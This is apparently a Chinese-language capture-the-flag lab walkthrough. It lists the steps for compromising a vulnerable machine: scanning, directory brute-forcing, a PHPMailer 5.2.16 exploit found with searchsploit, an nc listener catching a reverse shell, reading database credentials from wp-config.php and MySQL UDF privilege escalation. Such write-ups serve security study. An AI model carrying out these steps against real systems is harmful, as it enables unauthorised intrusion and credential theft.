参考文档:
https://blog.csdn.net/qq_34801745/article/details/103753259
1.收集信息 namp -sP 192.168.8.0/24 namp -sS -sV -T5 -A -p- 192.168.8.150 dirb http://192.168.8.150 //目录爆破,dirb是一个轻量级的目录爆破工具 2.----->>>>http://192.168.182.142/vendor 发现有目录遍历的漏洞 再PATH中找到第一个flat,和绝对路径 3.在vendor/README.md 发现 PHPMailer 5.2.16 ,猜测这是一个 PHPMailer 搭建的网站 4.kali 中 searchsploit PHPMailer 发现有该版本的漏洞利用 5.修改paload里面参数 6.直接用python 运行会出错,提示需要安装一个库 pip install requests-toolbelt安装即可,如果没用pip,需要sudo apt-get install python-pip安装即可。 7.nc -lvnp 4444 本机监听接收反弹shell, 用python获取pty 命令:python -c 'import pty;pty.spawn("/bin/bash")' //这里逗号不正确导致我试了几次才成功 8.find /var/ -name flag* //查找flag文件 9.在网站根目录下面的wp-config.php 中找到数据库用户名和密码 10.ps aux | grep root,查看到当前以root用户身份运行的所有进程,发现mysql是root运行的 mysql -uroot -pmima //登陆mysql,5.5版本,利用udf提权